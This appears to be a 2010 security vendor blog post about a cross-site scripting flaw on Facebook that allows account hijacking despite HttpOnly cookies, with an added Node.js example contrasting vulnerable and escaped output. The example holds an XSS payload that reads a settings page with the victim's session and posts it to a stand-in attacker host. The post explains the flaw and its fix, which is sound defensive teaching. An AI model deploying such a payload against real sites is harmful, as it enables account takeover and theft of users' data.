
Discovered XSS on Facebook can lead to account hijack

August 4th, 2010


Facebook rates as the second most popular website on the internet, with 400 million active users. When a site of that size carries common web application security flaws, they will be abused for someone's gain. When we came across an obvious cross-site scripting vulnerability, we decided to show what an attacker could actually do with it.

The video below shows how an attacker may exploit a cross-site scripting vulnerability on Facebook.com regardless of the HttpOnly flag set on the session cookie. HttpOnly keeps script from reading the cookie through document.cookie, but it does nothing to stop script already running in the victim's page from sending requests that the browser authenticates with that same cookie. The demonstration therefore goes well beyond showing an alert() popup in JavaScript: the attacker is able to hijack the victim's Facebook account. We have also published an article explaining in more technical detail how this cross-site scripting vulnerability is abused.
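The following is an added example, written for this page and not code from the original post or from Facebook, that models the two points above in Node.js: a reflected parameter interpolated into HTML without encoding beside the hardened version, and a minimal model of the browser's cookie rules showing that an HttpOnly session cookie is invisible to document.cookie yet still attached to any same-origin request the injected script makes. The page markup, cookie names, the /settings endpoint and the attacker.example host are all hypothetical.

```javascript
// Added example (not from the original Acunetix post): why the HttpOnly flag
// does not stop an XSS payload from acting as the victim.
// All paths, cookie names and page markup below are hypothetical.

// --- 1. The reflected XSS: unescaped interpolation vs. output encoding ------

// Vulnerable: the request parameter lands in the HTML body untouched.
function renderVulnerable(displayName) {
  return `<h1>Hello, ${displayName}</h1>`;
}

// Hardened: encode the five characters that matter in an HTML text context.
function escapeHtml(s) {
  return String(s).replace(/[&<>"']/g, (c) => ({
    '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;',
  })[c]);
}

function renderSafe(displayName) {
  return `<h1>Hello, ${escapeHtml(displayName)}</h1>`;
}

// --- 2. A payload that never touches document.cookie ------------------------
// Instead of stealing the cookie it drives the victim's own browser: the
// same-origin request is sent with the session cookie attached by the browser,
// HttpOnly or not. The /settings endpoint and attacker host are assumptions.
const PAYLOAD = `<script>
fetch('/settings', { credentials: 'same-origin' })
  .then(r => r.text())
  .then(html => fetch('//attacker.example/log', { method: 'POST', body: html }));
</script>`;

// --- 3. A minimal model of the browser's cookie rules ------------------------
// Constructed sample jar: one HttpOnly session cookie, one ordinary cookie.
const COOKIE_JAR = [
  { name: 'sessionid', value: 's3cr3t', httpOnly: true },
  { name: 'locale',    value: 'en_US',  httpOnly: false },
];

// What `document.cookie` exposes to script: HttpOnly cookies are hidden.
function documentCookie(jar) {
  return jar.filter(c => !c.httpOnly).map(c => `${c.name}=${c.value}`).join('; ');
}

// What the browser puts in the Cookie header of a same-origin request:
// every cookie, including the HttpOnly session cookie.
function cookieHeader(jar) {
  return jar.map(c => `${c.name}=${c.value}`).join('; ');
}

// Does the rendered page contain a live <script> element?
function containsScript(html) {
  return /<script\b/i.test(html);
}

// Collect the four observations in one place.
function summarize() {
  return {
    vulnerablePageRunsPayload: containsScript(renderVulnerable(PAYLOAD)),
    hardenedPageRunsPayload: containsScript(renderSafe(PAYLOAD)),
    visibleToScript: documentCookie(COOKIE_JAR),
    sentWithRequest: cookieHeader(COOKIE_JAR),
  };
}

console.log(summarize());
```

The model shows the limit of HttpOnly precisely: it removes the session cookie from what script can read, not from what script can do. The payload still runs in the victim's origin and every request it triggers is authenticated, so the only real fix is to stop the injection with output encoding such as escapeHtml.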

Alliance Technology Partners is an Acunetix partner specializing in IT security, including web application security.

